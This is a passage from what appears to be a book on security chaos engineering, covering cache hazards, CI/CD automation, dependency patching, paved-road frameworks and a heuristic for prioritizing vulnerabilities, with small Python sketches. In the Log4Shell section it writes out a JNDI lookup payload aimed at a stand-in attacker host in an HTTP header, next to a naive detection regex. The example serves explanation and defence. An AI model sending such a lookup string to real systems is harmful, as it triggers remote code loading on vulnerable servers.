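cache.invalidate("price:42")                       # ...so the writer invalidates
fresh = cache.get("price:42", origin.__getitem__)  # reloads the new value
```

The TTL is a safety net rather than a substitute for invalidation: a shorter TTL limits how long a missed invalidation can hurt, at the cost of a lower hit ratio and more traffic to the origin.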

The second hazard is a systemic effect where if the caches ever fail or degrade, they put pressure on the service. With high CHRs, even a partial cache failure can swamp a backend service. If the backend service is down, you can’t fill cache entries, and this leads to more traffic bombarding the backend service. Services without caches slow to a crawl, but recover gracefully as more capacity is added or traffic subsides. Services with a cache collapse as they approach capacity and recovery often requires substantial additional capacity beyond steady state.
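
A back-of-the-envelope sketch makes this second hazard concrete. The backend only sees cache misses, so the higher the CHR, the larger the multiplier when the cache degrades. The function names and traffic figures below are illustrative assumptions, not measurements from a real system.

```python
def backend_rps(total_rps: float, cache_hit_ratio: float) -> float:
    """Requests per second that miss the cache and reach the backend."""
    if not 0.0 <= cache_hit_ratio <= 1.0:
        raise ValueError("cache_hit_ratio must be between 0 and 1")
    return total_rps * (1.0 - cache_hit_ratio)


def amplification(healthy_chr: float, degraded_chr: float) -> float:
    """Factor by which backend traffic grows when the hit ratio drops."""
    healthy_load = backend_rps(1.0, healthy_chr)
    if healthy_load == 0.0:
        raise ValueError("a 100% hit ratio sends no traffic to the backend")
    return backend_rps(1.0, degraded_chr) / healthy_load


# Hypothetical service: 10,000 requests/second at a 95% cache hit ratio.
print(f"healthy backend load: {backend_rps(10_000, 0.95):.0f} rps")
print(f"half the cache lost:  {backend_rps(10_000, 0.475):.0f} rps")
print(f"cache fully down:     {amplification(0.95, 0.0):.0f}x the usual load")
```

Under these assumed numbers, a backend sized for roughly 500 requests per second faces about 5,250 when half the cache is lost and the full 10,000 when the cache is down, which is why recovery often needs capacity well beyond steady state.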

Yet, even with these hazards, caches are nuanced from a resilience perspective. They benefit resilience because they can decouple requests from the origin (i.e., backend server); the service better weathers surprises but not necessarily sustained failures. While clients are now less tightly coupled to our origin’s behavior, they instead become tightly coupled with the cache. This tight coupling grants greater efficiency and reduced costs, which is why caching is widely practiced. But, for the resilience reasons we just mentioned, few organizations are “rolling their own caches.” For instance, they often outsource web traffic caching to a dedicated provider, such as a content delivery network (CDN).

Tip

Every choice you make either resists or capitulates to tight coupling. The tail end of loose coupling is full swappability of components and languages in your systems, but vendors much prefer lock-in (i.e., tight coupling). When you make choices on your raw materials, always consider whether they move you closer to or away from the Danger Zone, introduced in Chapter 3.

To recap, during this phase, we can pursue four practices to support critical functionality, the first ingredient of our resilience potion: the airlock approach, thoughtful code reviews, choosing “boring” tech, and standardizing raw materials. Now, let’s proceed to the second ingredient: understanding the system’s safety boundaries (thresholds).

Developing and Delivering to Expand Safety Boundaries



The second ingredient of our resilience potion is understanding the system’s safety boundaries—the thresholds beyond which it slips into failure. But we can also help expand those boundaries during this phase, expanding our system’s figurative window of tolerance to adverse conditions. This section describes the range of behavior that should be expected of the sociotechnical system, with humans curating the system as it drifts from the designed ideal (the mental models constructed during the design and architecture phase). There are four key practices we’ll cover that support safety boundaries: anticipating scale, automating security checks, standardizing patterns and tools, and understanding dependencies (including prioritizing vulnerabilities in them).

The good news is that a lot of getting security “right” is actually just solid engineering—things you want to do for reliability and resilience to disruptions other than attacks. In the SCE world, application security is thought of as another facet of software quality: given your constraints, how can you write high-quality software that achieves your goals? The practices we’ll explore in this section beget both higher-quality and more resilient software.

We mentioned in the last chapter that what we want in our systems is sustained adaptability. We can nurture sustainability during this phase as part of stretching our boundaries of safe operation too. Sustainability and resilience are interrelated concepts across many complex domains. In environmental science, both resilience and sustainability involve preservation of societal health and well-being in the presence of environmental change.4 In software engineering, we typically refer to sustainability as “maintainability.” It’s no less true in our slice of life that both maintainability and resilience are concerned with the health and well-being of software services in the presence of destabilizing forces, like attackers. As we’ll explore throughout this section, supporting maintainable software engineering practices—including repeatable workflows—is vital for building and delivering systems that can sustain resilience against attacks.

The processes by which you build and deliver must be clear, repeatable, and maintainable—just as we described in Chapter 2 when we introduced RAVE. The goal is to standardize building and delivering as much as you can to reduce unexpected interactions. It also means rather than relying on everything being perfect ahead of deployment, you can cope well with mistakes because fixing them is a swift, straightforward, repeatable process. Weaving this sustainability into our build and delivery practices helps us expand our safety boundaries and gain more grace in the face of adverse scenarios.

Anticipating Scale and SLOs

The first practice during this phase that can help us expand our safety boundaries is, simply put, anticipating scale. When building resilient software systems, we want to consider how operating conditions might evolve and therefore where its boundaries of safe operation lie. Despite best intentions, software engineers sometimes make architecture or implementation decisions that induce either reliability or scalability bottlenecks.

Anticipating scale is another way of challenging those “this will always be true” assumptions we described in the last chapter—the ones attackers exploit in their operations. Consider an eCommerce service. We may think, “On every incoming request, we first need to correlate that request with the user’s prior shopping cart, which means making a query to this other thing.” There is a “this will always be true” assumption baked into this mental model: that the “other thing” will always be there. If we’re thoughtful, then we must challenge: “What if this other thing isn’t there? What happens then?” This can then refine how we build something (and we should document the why—the assumption that we’ve challenged—as we’ll discuss later in this chapter). What if the user’s cart retrieval is slow to load or unavailable?
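
As a minimal sketch of what challenging that assumption might look like in code, the request handler below treats the cart store as something that can be slow or absent and degrades to an empty cart instead of failing the whole request. Everything here is hypothetical: the `CartResult` type, the `get_cart` function, the 0.2-second timeout, and the two stand-in fetchers. A real service would pass its own client call as `fetch`.

```python
from dataclasses import dataclass, field
from typing import Callable, List


@dataclass
class CartResult:
    items: List[str] = field(default_factory=list)
    degraded: bool = False  # True when we could not reach the cart store


def get_cart(user_id: str,
             fetch: Callable[[str, float], List[str]],
             timeout_s: float = 0.2) -> CartResult:
    """Fetch the user's prior cart, but never let its absence fail the request."""
    try:
        return CartResult(items=fetch(user_id, timeout_s))
    except (TimeoutError, ConnectionError):
        # Challenged assumption: the cart store is NOT always there.
        # Serve an empty cart and flag it so the caller can tell the user.
        return CartResult(degraded=True)


# Hypothetical stand-ins for the "other thing" the request depends on.
def healthy_fetch(user_id: str, timeout_s: float) -> List[str]:
    return ["book", "lamp"]


def unavailable_fetch(user_id: str, timeout_s: float) -> List[str]:
    raise TimeoutError(f"cart store did not answer within {timeout_s}s")


print(get_cart("user-1", healthy_fetch))
print(get_cart("user-1", unavailable_fetch))
```

The comment inside the `except` branch is the documented why: it records which assumption was challenged, so the next engineer does not mistake the fallback for dead code.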

Challenging our “this will always be true” assumptions can expose potential scalability issues at lower levels too. If we say, “we’ll always start with a control flow graph, which is the output of a previous analysis,” we can challenge it with a question like “what if that analysis is either super slow or fails?” Investing effort capital in anticipating scale can ensure we do not artificially constrict our system’s safety boundaries—and that potential thresholds are folded into our mental models of the system.

When we’re building components that will run as part of big, distributed systems, part of anticipating scale is anticipating what operators will need during incidents (i.e., what effort investments they need to make). If it takes an on-call engineer hours to discover that the reason for sudden service slowness is a SQLite database no one knew about, it will hurt your performance objectives. We also need to anticipate how the business will grow, like estimating traffic growth based on roadmaps and business plans, to prepare for it. When we estimate which parts of the system we’ll need to expand in the future and which are unlikely to need expansion, we can be thrifty with our effort investments while ensuring the business can grow unimpeded by software limitations.

We should be thoughtful about supporting the patterns we discussed in the last chapter. If we design for immutability and ephemerality, this means engineers can’t SSH into the system to debug or change something, and that the workload can be killed and restarted at will. How does this change how we build our software? Again, we should capture these why points—that we built it this way to support immutability and ephemerality—to capture knowledge (which we’ll discuss in a bit). Doing so helps us expand our window of tolerance and solidifies our understanding of the system’s thresholds beyond which failure erupts.



Automating Security Checks via CI/CD

One of the more valuable practices to support expansion of safety boundaries is automating security checks by leveraging existing technologies for resilience use cases. The practice of continuous integration and continuous delivery5 (CI/CD) accelerates the development and delivery of software features without compromising reliability or quality.6 A CI/CD pipeline consists of sets of (ideally automated) tasks that deliver a new software release. It generally involves compiling the application (known as “building”), testing the code, deploying the application to a repository or staging environment, and delivering the app to production (known as “delivery”). Using automation, CI/CD pipelines ensure these activities occur at regular intervals with minimal interference required by humans. As a result, CI/CD supports the characteristics of speed, reliability, and repeatability that we need in our systems to keep them safe and resilient.

Tip

- Continuous integration (CI)

Humans integrate and merge development work (like code) frequently (like multiple times per day). It involves automated software building and testing to achieve shorter, more frequent release cycles, enhanced software quality, and amplified developer productivity.

- Continuous delivery (CD)

Humans introduce software changes (like new features, patches, configuration edits, and more) into production or to end users. It involves automated software publishing and deploying to achieve faster, safer software updates that are more repeatable and sustainable.7

We should appreciate CI/CD not just as a mechanism to avoid the toil of manual deploys, but also as a tool to make software delivery more repeatable, predictable, and consistent. We can enforce invariants, allowing us to achieve whatever properties we want every time we build, deploy, and deliver software. Companies that can build and deliver software more quickly can also ameliorate vulnerabilities and security issues more quickly. If you can ship when you want, then you can be confident you can ship security fixes when you need to. For some companies, that may look hourly and for others daily. The point is your organization can deliver on demand and therefore respond to security events on demand.
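
To illustrate what enforcing an invariant in a pipeline could look like, the sketch below fails a build whenever a dependency is not pinned to one exact version. The invariant itself, the function names, and the sample manifest are assumptions chosen for illustration; your pipeline would encode whatever properties matter to your system.

```python
import re
from typing import Iterable, List

# name==version, for example "requests==2.31.0"; anything looser is a violation.
PINNED = re.compile(r"^[A-Za-z0-9_.\-\[\],]+==[A-Za-z0-9_.!+\-]+$")


def unpinned_requirements(lines: Iterable[str]) -> List[str]:
    """Return requirement lines that are not pinned to one exact version."""
    violations = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if line and not PINNED.match(line):
            violations.append(line)
    return violations


def pipeline_exit_code(lines: Iterable[str]) -> int:
    """0 lets the pipeline continue; 1 fails the build on any violation."""
    violations = unpinned_requirements(lines)
    for line in violations:
        print(f"invariant violated, dependency not pinned: {line}")
    return 1 if violations else 0


# Hypothetical manifest contents; a real step would read them from the repository.
manifest = ["requests==2.31.0", "flask>=2.0  # floating range", "", "# tooling"]
exit_code = pipeline_exit_code(manifest)
```

A pipeline step would hand `exit_code` to `sys.exit` so that a nonzero value stops the run. Because the check executes on every build, the property holds every time rather than only when someone remembers to look.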

From a resilience perspective, manual deployments (and other parts of the delivery workflow) not only consume precious time and effort better spent elsewhere, but also tightly couple the human to the process with no hope of linearity. Humans are fabulous at adaptation and responding with variety and absolutely hopeless at doing the same thing the same way over and over. The security and sysadmin status quo of “ClickOps” is, through this lens, frankly dangerous. It increases tight coupling and complexity, without the efficiency blessings we’d expect from this Faustian bargain—akin to trading our soul for a life of tedium. The alternative of automated CI/CD pipelines not only loosens coupling and introduces more linearity, but also speeds up software delivery, one of the win-win situations we described in the last chapter. The same goes for many forms of workflow automation when the result is standardized, repeatable patterns.

In an example far more troubling than manual deploys, local indigenous populations on Noepe (Martha’s Vineyard) faced the dangers of tight coupling when the single ferry service delivering food was disrupted by the COVID-19 pandemic.8 If we think of our pipeline as a food pipeline (as part of the broader food supply chain), then we perceive the poignant need for reliability and resilience. It is no different for our build pipelines (which, thankfully, do not imperil lives).

Tip

When you perform chaos experiments on your systems, having repeatable build-and-deploy workflows ensures you have a low-friction way to incorporate insights from those experiments and continuously refine your system. Having versioned and auditable build-and-deploy trails means you can more easily understand why the system is behaving differently after a change. The goal is for software engineers to receive feedback as close to immediate as possible while the context is still fresh. They want to reach the finish line of their code successfully and reliably running in production, so harness that emotional momentum and help them get there.

Faster patching and dependency updates

A subset of automating security checks to expand safety boundaries is the practice of faster patching and dependency updates. CI/CD can help us with patching and, more generally, keeping dependencies up to date—which helps avoid bumping into those safety boundaries. Patching is a problem that plagues cybersecurity. The most famous example of this is the 2017 Equifax breach in which an Apache Struts vulnerability was not patched for four months after disclosure. This violated their internal mandate of patching vulnerabilities within 48 hours, highlighting once again why strict policies are insufficient for promoting real-world systems resilience. More recently, the 2021 Log4Shell vulnerability in Log4j, which we discussed in Chapter 3, precipitated a blizzard of activity to both find vulnerable systems across the organization and patch them without breaking anything.

In theory, developers want to be on the latest version of their dependencies. The latest versions have more features, include bug fixes, and often have performance, scalability, and operability improvements.9 In practice, there are many reasons why they might not be; when engineers are attached to an older version, there is usually a reason. Some of those reasons are very reasonable, some less so.

Production pressures are probably the largest reason because upgrading is a task that delivers no immediate business value. Another reason is that semantic versioning (SemVer) is an ideal to aspire to, but it’s slippery in practice. It’s unclear whether the system will behave correctly when you upgrade to a new version of the dependency unless you have amazing tests that fully cover its behaviors, which no one has.
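
The ideal SemVer describes is that a version number of the form MAJOR.MINOR.PATCH signals how disruptive an upgrade should be. A small sketch of using that signal to decide how much scrutiny an upgrade gets follows; the function names and the policy table are hypothetical, and the parser deliberately ignores pre-release and build suffixes to stay short. Because the signal is slippery in practice, even the "patch" path in this sketch still depends on the test suite.

```python
from typing import Tuple


def parse_semver(version: str) -> Tuple[int, int, int]:
    """Parse 'MAJOR.MINOR.PATCH', ignoring pre-release and build suffixes."""
    core = version.split("+", 1)[0].split("-", 1)[0]
    major, minor, patch = (int(part) for part in core.split("."))
    return major, minor, patch


def classify_upgrade(current: str, candidate: str) -> str:
    """Return 'major', 'minor', 'patch', or 'none' for a proposed upgrade."""
    cur, new = parse_semver(current), parse_semver(candidate)
    if new <= cur:
        return "none"
    if new[0] != cur[0]:
        return "major"
    if new[1] != cur[1]:
        return "minor"
    return "patch"


# Hypothetical policy: how much scrutiny each kind of bump gets.
POLICY = {
    "patch": "merge automatically once the test suite passes",
    "minor": "merge once tests pass and a human skims the changelog",
    "major": "schedule a reviewed upgrade; breaking changes are expected",
    "none": "nothing to do",
}

bump = classify_upgrade("2.14.1", "2.17.0")
print(bump, "->", POLICY[bump])
```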

On the less reasonable end of the spectrum is the forced refactor, like when a dependency is rewritten or experiences substantial API changes. This is a symptom of engineers’ predilection for selecting shiny and new technologies versus stable and “boring” ones (that is, picking things that aren’t appropriate for real work). A final reason is abandoned dependencies: the dependency’s creator no longer maintains it and no direct replacement was made, or the direct replacement is meaningfully different.

This is precisely why automation (including CI/CD pipelines) can help: it removes human effort from keeping dependencies up to date and frees that effort for more valuable activities, like adaptation. We don’t want to burn out engineers’ focus with tedium. Automated CI/CD pipelines mean updates and patches can be tested and pushed to production in hours (or sooner!) rather than the days, weeks, or even months that it traditionally takes. Automation can make update-and-patch cycles an automatic and daily affair, eliminating toil work so other priorities can receive attention.

Automated integration testing means that updates and patches will be evaluated for potential performance or correctness problems before being deployed to production, just like other code. Concerns around updates or patches disrupting production services—which can result in procrastination or protracted evaluations that take days or weeks—can be automated away, at least in part, by investing in testing. We must expend effort in writing tests we can automate, but we salvage considerable effort over time by avoiding manual testing.

Automating the release phase of software delivery also offers security benefits. Automatically packaging and deploying a software component results in faster time to delivery, accelerating patching and security changes as we mentioned. Version control is also a security boon because it expedites rollback and recovery in case something goes wrong. We’ll discuss the benefits of automated infrastructure provisioning in the next section.

Resilience benefits of continuous delivery

Continuous delivery is a practice you should only adopt after you’ve already put other practices described in this section—and even in the whole chapter—in place. If you don’t have CI and automated testing catching most of your change-induced failures, CD will be hazardous and will gnaw at your ability to maintain resilience. CD requires more rigor than CI; it feels meaningfully different. CI lets you add automation to your existing processes and achieve workflow benefits, but doesn’t really impose changes to how you deploy and operationalize software. CD, however, requires that you get your house in order. Any possible mistake that can be made by developers as part of development, after enough time, will be made by developers. (Most of the time, of course, anything that can go right will go right.) All aspects of the testing and validation of the software must be automated to catch those mistakes before they become failures, and it requires more planning around backward and forward compatibility, protocols, and data formats.

With these caveats in mind, how can CD help us uphold resilience? It is impossible to make manual deployments repeatable. It is unfair to expect a human engineer to execute manual deployments flawlessly every time—especially under ambiguous conditions. Many things can go wrong even when deployments are automated, let alone when a human performs each step. Resilience—by way of repeatability, security, and flexibility—is baked into the goal of CD: to deliver changes—whether new features, updated configurations, version upgrades, bug fixes, or experiments—to end users with sustained speed and security.10

Releasing more frequently actually enhances stability and reliability. Common objections to CD include the idea that CD doesn’t work in highly regulated environments, that it can’t be applied to legacy systems, and that it involves enormous feats of engineering to achieve. A lot of this is based on the now thoroughly disproven myth that moving quickly inherently increases “risk” (where “risk” remains a murky concept).11

While we are loath to suggest hyperscale companies should be used as exemplars, it is worth considering Amazon as a case study for CD working in regulated environments. Amazon handles thousands of transactions per minute (up to hundreds of thousands during Prime Day), making it subject to PCI DSS (a compliance standard covering credit card data). And, because Amazon is a publicly traded company, the Sarbanes-Oxley Act regulating accounting practices applies to it too. But, even as of 2011, Amazon was releasing changes to production on average every 11.6 seconds, with as many as 1,079 deployments in a single hour at peak.12 SRE and author Jez Humble writes, “This is possible because the practices at the heart of continuous delivery—comprehensive configuration management, continuous testing, and continuous integration—allow the rapid discovery of defects in code, configuration problems in the environment, and issues with the deployment process.”13 When you combine continuous delivery with chaos experimentation, you get rapid feedback cycles that are actionable.

This may sound daunting. Your security culture may feel Shakespearean in its levels of theatrics. Your tech stack may feel more like a pile of LEGOs you painfully step on. But you can start small. The perfect first step to work toward CD is “PasteOps.” Document the manual work involved when deploying security changes or performing security-related tasks as part of building, testing, and deploying. A bulleted list in a shared resource can suffice as an MVP for automation, allowing iterative improvement that can eventually turn into real scripts or tools. SCE is all about iterative improvement like this. Think of evolution in natural systems; fish didn’t suddenly evolve legs and opposable thumbs and hair all at once to become humans. Each generation offers better adaptations for the environment, just as each iteration of a process is an opportunity for refinement. Resist the temptation to perform a grand, sweeping change or reorg or migration. All you need is just enough to get the flywheel going.
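
One way to take the next small step from a bulleted list toward real scripts is to paste the list into a script that, at first, automates nothing and simply walks a human through each item (an approach sometimes called a “do-nothing script”). Individual steps can then be replaced with code one at a time. The sketch below assumes that approach; the `Step` type, the `run` function, and every runbook item are illustrative placeholders, not a recommended procedure.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class Step:
    description: str
    automate: Optional[Callable[[], None]] = None  # None means still manual


def run(steps: List[Step], confirm: Callable[[str], str] = input) -> int:
    """Walk the checklist in order; return how many steps ran without a human."""
    automated = 0
    for number, step in enumerate(steps, start=1):
        if step.automate is None:
            confirm(f"[{number}] MANUAL: {step.description} (Enter when done) ")
        else:
            step.automate()
            automated += 1
            print(f"[{number}] automated: {step.description}")
    return automated


def record_release_note() -> None:
    """Hypothetical first step to be automated; a real one would call a tool."""
    print("release note recorded")


# The bulleted list, pasted in as data. Every item here is illustrative.
SECURITY_PATCH_RUNBOOK = [
    Step("Confirm the patched version passes tests in staging"),
    Step("Rotate the service credentials"),
    Step("Record the change in the release notes", automate=record_release_note),
]
```

Calling `run(SECURITY_PATCH_RUNBOOK)` prompts for each manual step and executes the automated one. The returned count gives a rough measure of how far the flywheel has turned as more steps gain an `automate` function.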

Standardization of Patterns and Tools

Similar to the practice of standardizing raw materials to support critical functionality, standardizing tools and patterns is a practice that supports expanding safety boundaries and keeping operating conditions within those boundaries. Standardization can be summarized as ensuring work produced is consistent with preset guidelines. Standardization helps reduce the opportunity for humans to make mistakes by ensuring a task is performed the same way each time (which humans aren’t designed to do). In the context of standardized patterns and tools, we mean consistency in what developers use for effective interaction with the ongoing development of the software.

This is an area where security teams and platform engineering teams can collaborate to achieve the shared goal of standardization. In fact, platform engineering teams could even perform this work on their own if that befits their organizational context. As we keep saying, the mantle of “defender” suits anyone regardless of their usual title if they’re supporting systems resilience (we’ll discuss this in far more depth in Chapter 7).

If you don’t have a platform engineering team and all you have are a few eager defenders and a slim budget, you can still help standardize patterns for teams and reduce the temptation of rolling-their-own-thing in a way that stymies security. The simplest tactic is to prioritize patterns for parts of the system with the biggest security implications, like authentication or encryption. If it’d be difficult for your team to build standardized patterns, tools, or frameworks, you can also scout standard libraries to recommend and ensure that list is available as accessible documentation. That way, teams know there’s a list of well-vetted libraries they should consult and choose from when needing to implement specific functionality. Anything else they might want to use outside of those libraries may merit a discussion, but otherwise they can progress in their work without disrupting the security or platform engineering team’s work.

However you achieve it, constructing a “Paved Road” for other teams is one of the most valuable activities in a security program. Paved roads are well-integrated, supported solutions to common problems that allow humans to focus on their unique value creation (like creating differentiated business logic for an application).14 While we mostly think about paved roads in the context of product engineering activities, paved roads absolutely apply elsewhere in the organization, like security. Imagine a security program that finds ways to accelerate work! Making it easy for a salesperson to adopt a new SaaS app that helps them close more deals is a paved road. Making it easy for users to audit their account security rather than burying it in nested menus is a paved road too. We’ll talk more about enabling paved roads as part of a resilience program in Chapter 7.

Paved roads in action: Examples from the wild

One powerful example of a paved road—standardizing a few patterns for teams in one invaluable framework—comes from Netflix’s Wall-E framework. As anyone who’s had to juggle deciding on authentication, logging, observability, and other patterns while trying to build an app on a shoestring budget will recognize, being bequeathed this kind of framework sounds like heaven. Taking a step back, it’s a perfect example of how we can pioneer ways for resilience (and security) solutions to fulfill production pressures—the “holy grail” in SCE. Like many working in technology, we cringe at the word synergies, but they are real in this case—as with many paved roads—and it may ingratiate you with your CFO to gain buy-in for the SCE transformation.

From the foundation of a curious security program, Netflix started with the observation that software engineering teams had to consider too many security things when building and delivering software: authentication, logging, TLS certificates, and more. They had extensive security checklists for developers that created manual effort and were confusing to perform (as Netflix stated, “There were flowcharts inside checklists. Ouch.”). The status quo also created more work for their security engineering team, which had to shepherd developers through the checklist and validate their choices manually anyway.

Thus, Netflix’s application security (appsec) team asked themselves how to build a paved road for the process by productizing it. Their team thinks of the paved road as a way to sculpt questions into Boolean propositions. In their example, instead of saying, “Tell me how your app does this important security thing,” they verify that the team is using the relevant paved road to handle the security thing.

The paved road Netflix built, called Wall-E, established a pattern of adding security requirements as filters that replaced existing checklists that required web application firewalls (WAFs), DDoS prevention, security header validation, and durable logging. In their own words, “We eventually were able to add so much security leverage into Wall-E that the bulk of the ‘going internet-facing’ checklist for Studio applications boiled down to one item: Will you use Wall-E?”

They also thought hard about reducing adoption friction (in large part because adoption was a key success metric for them; other security teams, take note). Having studied existing workflow patterns, they asked product engineering teams to integrate with Wall-E by creating a version-controlled YAML file, which, aside from making it easier to package configuration data, also “harvested developer intent.” Since they had a “concise, standardized definition of the app they intended to expose,” Wall-E could proactively automate much of the toil work developers didn’t want to do after only a few minutes of setup. The results benefit both efficiency and resilience, which is exactly what we seek to satisfy our organizations’ thirst for more quickly doing more and our quest for resilience: “For a typical paved road application with no unusual security complications, a team could go from git init to a production-ready, fully authenticated, internet-accessible application in a little less than 10 minutes.” The product developers didn’t necessarily care about security, but they eagerly adopted it when they realized this standardized pattern helped them ship code to users more quickly and iterate more quickly. Iteration is a key way we can foster flexibility during build and delivery, as we’ll discuss toward the end of the chapter.

Dependency Analysis and Prioritizing Vulnerabilities

The final practice we can adopt to expand and preserve our safety boundaries is dependency analysis—and, in particular, prudent prioritization of vulnerabilities. Dependency analysis, especially in the context of unearthing bugs (including security vulnerabilities), helps us understand faults in our tools so we can fix or mitigate them—or even consider better tools. We can treat this practice as a hedge against potential stressors and surprises, allowing us to invest our effort capital elsewhere. The security industry hasn’t made it easy to understand when a vulnerability is important, however, so we’ll start by revealing heuristics for knowing when we should invest effort into fixing them.

Prioritizing vulnerabilities

When should you care about a vulnerability? Let’s say a new vulnerability is being hyped on social media. Does it mean you should stop everything to deploy a fix or patch for it? Or will alarm fatigue enervate your motivation? Whether you should care about a vulnerability depends on two primary factors:

How easy is the attack to automate and scale?

How many steps away is the attack from the attacker’s goal outcome?

The first factor, the ease of automating and scaling the attack (i.e., vulnerability exploit), is historically described by the term wormable.15 Can an attacker leverage this vulnerability at scale? An attack that requires zero attacker interaction would be easy to automate and scale. Crypto mining is often in this category. The attacker can create an automated service that queries a tool like Shodan for vulnerable instances of applications requiring ample compute, like Kibana or a CI tool. The service then runs an automated attack script against each instance and, if the attack succeeds, automatically downloads and executes the crypto mining payload. The attacker may be notified if something is going wrong (just like your typical Ops team), but can often let this kind of tool run completely on its own while they focus on other criminal activity. Their strategy is to get as many leads as they can to maximize the potential coins mined during any given period of time.

The second factor is, in essence, related to the vulnerability’s ease of use for attackers. It is arguably an element of whether the attack is automatable and scalable, but is worth mentioning on its own given this is where vulnerabilities described as “devastating” often obviously fall short of such claims. When attackers exploit a vulnerability, it gives them access to something. The question is how close that something is to their goals. Sometimes vulnerability researchers—including bug bounty hunters—will insist that a bug is “trivial” to exploit, despite it requiring a user to perform numerous steps. As one anonymous attacker-type quipped, “I’ve had operations almost fail because a volunteer victim couldn’t manage to follow instructions for how to compromise themselves.”

Let’s elucidate this factor by way of example. In 2021, a proof of concept was released for Log4Shell, a vulnerability in the Apache Log4j library (we’ve discussed this in prior chapters). The vulnerability offered fantastic ease of use for attackers, allowing them to gain code execution on a vulnerable host by passing special “jndi:” text (referring to the Java Naming and Directory Interface, or JNDI) into a field logged by the application. If that sounds relatively trivial, it is. There is arguably only one real step in the attack: attackers provide the string (a jndi: insertion in a loggable HTTP header containing a malicious URI), which forces the Log4j instance to make an LDAP query to the attacker-controlled URI, which then leads to a chain of automated events that result in an attacker-provided Java class being loaded into memory and executed by the vulnerable Log4j instance. Only one step (plus some prep work) required for remote code execution? What a value prop! This is precisely why Log4Shell was so easy for attackers to automate and scale, which they did within 24 hours of the proof of concept being released.
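To make the “one real step” concrete, here is a minimal sketch of what that attacker-supplied string looks like and how a naive check could flag it in request headers. The function name, the header values, and the attacker.example host are hypothetical, and the pattern is deliberately simplistic: real exploit attempts used nested lookups to obfuscate the string, so this illustrates the shape of the input and should not be read as a reliable detection.

```python
import re

# Naive pattern for a Log4j-style JNDI lookup such as "${jndi:ldap://...}".
# Assumption: no obfuscation. Nested lookups would slip past this check.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def suspicious_headers(headers: dict[str, str]) -> list[str]:
    """Return the names of headers whose values contain a plain jndi: lookup."""
    return [name for name, value in headers.items() if JNDI_LOOKUP.search(value)]


# A single header is the attacker's entire "step": if the application logs
# this value with a vulnerable Log4j version, the lookup is triggered.
request_headers = {
    "User-Agent": "${jndi:ldap://attacker.example/a}",
    "Accept": "*/*",
}
flagged = suspicious_headers(request_headers)
```

The point of the sketch is how little the attacker has to supply, which is what makes the attack so cheap to script against every reachable host.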

As another example, Heartbleed is on the borderline of acceptable ease of use for attackers. Heartbleed enables attackers to get arbitrary memory, which might include secrets, which attackers could maybe use to do something else and then…you can see that the ease of use is quite conditional. This is where the footprint factor (how widely the vulnerable software is deployed and exposed) comes into play; if few publicly accessible systems used OpenSSL, then performing those steps might not be worth it to attackers. But because the library is popular, some attackers might put in the effort to craft an attack that scales. We say “some,” because in the case of Heartbleed, what the access to arbitrary memory gives attackers is essentially the ability to read whatever junk is in the reused OpenSSL memory, which might be encryption keys or other data that was encrypted or decrypted. And we do mean “junk.” It’s difficult and cumbersome for attackers to obtain the data they might be seeking, and even though the exact same vulnerability was everywhere and remotely accessible, it takes a lot of target-specific attention to turn it into anything useful. The only generic attack you can form with this vulnerability is to steal the private keys of vulnerable servers, and that is only useful as part of an elaborate and complicated meddler-in-the-middle attack.

At the extreme end of requiring many steps, consider a vulnerability like Rowhammer, a fault in many DRAM modules in which repeated memory row activations can cause bit flips in adjacent rows. It, in theory, has a massive attack footprint because it affects a “whole generation of machines.” In practice, there are quite a few requirements to exploit Rowhammer for privilege escalation, and that’s after the initial limitation of needing local code execution: bypassing the cache and allocating a large chunk of memory; searching for bad rows (locations that are prone to flipping bits); checking if those locations will allow for the exploit; returning that chunk of memory to the OS; forcing the OS to reuse the memory; picking two or more “row-conflict address pairs” and hammering the addresses (i.e., activating the chosen addresses) to force the bit flip, which results in read/write access to, for instance, a page table, which the attacker can abuse to then execute whatever they really want to do. And that’s before we get into the complications with causing the bits to flip. You can see why we haven’t seen this attack in the wild and why we’re unlikely to see it at scale like the exploitation of Log4Shell.

So, when you’re prioritizing whether to fix a vulnerability immediately—especially if the fix results in performance degradation or broken functionality—or wait until a more viable fix is available, you can use this heuristic: can the attack scale, and how many steps does it require the attackers to perform? As one author has quipped before, “If there is a vulnerability requiring local access, special configuration settings, and dolphins jumping through ring 0,” then it’s total hyperbole to treat the affected software as “broken.” But, if all it takes is the attacker sending a string to a vulnerable server to gain remote code execution over it, then it’s likely a matter of how quickly your organization will be affected, not if. In essence, this heuristic allows you to categorize vulnerabilities into “technical debt” versus “impending incident.” Only once you’ve eliminated all chances of incidental attacks—which is the majority of them—should you worry about super slick targeted attacks that require attackers to engage in spy movie–level tactics to succeed.
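As a rough illustration, the heuristic can be sketched as a small triage function. Everything here is an assumption made for the example: the field names, the way “can scale” is approximated (remotely reachable and no victim interaction), the step counts, and the cutoff of two steps. None of it is a standard scoring system, so treat it as a thinking aid and tune it to your own context.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Vulnerability:
    name: str
    remotely_reachable: bool        # reachable without local access?
    needs_victim_interaction: bool  # must a user click, paste, or follow steps?
    steps_to_goal: int              # rough count of attacker steps to reach their goal


def can_scale(vuln: Vulnerability) -> bool:
    """Approximate 'automatable and scalable' with two coarse signals."""
    return vuln.remotely_reachable and not vuln.needs_victim_interaction


def triage(vuln: Vulnerability, max_steps: int = 2) -> str:
    """Sort a vulnerability into 'impending incident' or 'technical debt'."""
    if can_scale(vuln) and vuln.steps_to_goal <= max_steps:
        return "impending incident"
    return "technical debt"


# Illustrative inputs only; the step counts are rough readings of the text above.
log4shell = Vulnerability("Log4Shell", remotely_reachable=True,
                          needs_victim_interaction=False, steps_to_goal=1)
rowhammer = Vulnerability("Rowhammer", remotely_reachable=False,
                          needs_victim_interaction=False, steps_to_goal=7)

for vuln in (log4shell, rowhammer):
    print(f"{vuln.name}: {triage(vuln)}")
```

A borderline case like Heartbleed shows why the cutoff is a judgment call: it is remotely reachable, but the number of steps between reading memory and reaching a goal depends heavily on the target.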

Tip

This is another case where isolation can help us support resilience. If the vulnerable component is in a sandbox, the attacker must surmount another challenge before they can reach their goal.

Remember, vulnerability researchers are not attackers. Just because they are hyping their research doesn’t mean the attack can scale or present sufficient efficiency for attackers. Your local sysadmin or SRE is closer to the typical attacker than a vulnerability researcher.

Configuration bugs and error messages

